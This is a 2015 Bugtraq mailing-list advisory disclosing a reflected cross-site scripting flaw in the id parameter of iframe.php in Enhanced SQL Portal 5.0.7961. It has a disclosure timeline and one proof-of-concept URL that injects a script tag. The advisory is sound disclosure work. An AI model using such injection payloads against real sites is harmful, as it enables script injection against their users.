[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Enhanced SQL Portal 5.0.7961 XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Enhanced SQL Portal 5.0.7961 XSS Vulnerability
From: apparitionsec@xxxxxxxxx
Date: Tue, 2 Jun 2015 04:09:37 GMT

[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt



Vendor:
www.eliacom.com
www.eliacom.com/mysql-gui-download.php



Product:
Enhanced SQL Portal 5.0.7961 web based MySQL administration application.



Advisory Information:
================================================
Enhanced SQL Portal 5.0.7961 XSS Vulnerability




Vulnerability Details:
=====================
iframe.php contains an XSS vulnerability



Exploit code(s):
===============


http://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.php?id="/><script>alert(666)</script>
  


Disclosure Timeline:
=========================================================


Vendor Notification: May 28, 2015
June 2, 2015 : Public Disclosure


Severity Level:
=========================================================
Med



Description:
==========================================================

Request Method(s):
                                [+] GET

Vulnerable Product:
                                [+] Enhanced SQL Portal 5.0.7961 

Vulnerable Parameter(s):
                                [+] id

Affected Area(s):
                                [+] iframe

===============================================================

(hyp3rlinx)

Prev by Date: Freebox OS Web interface 3.0.2 XSS, CSRF
Next by Date: vfront-0.99.2 CSRF & Persistent XSS
Previous by thread: Freebox OS Web interface 3.0.2 XSS, CSRF
Next by thread: vfront-0.99.2 CSRF & Persistent XSS
Index(es):
- Date
- Thread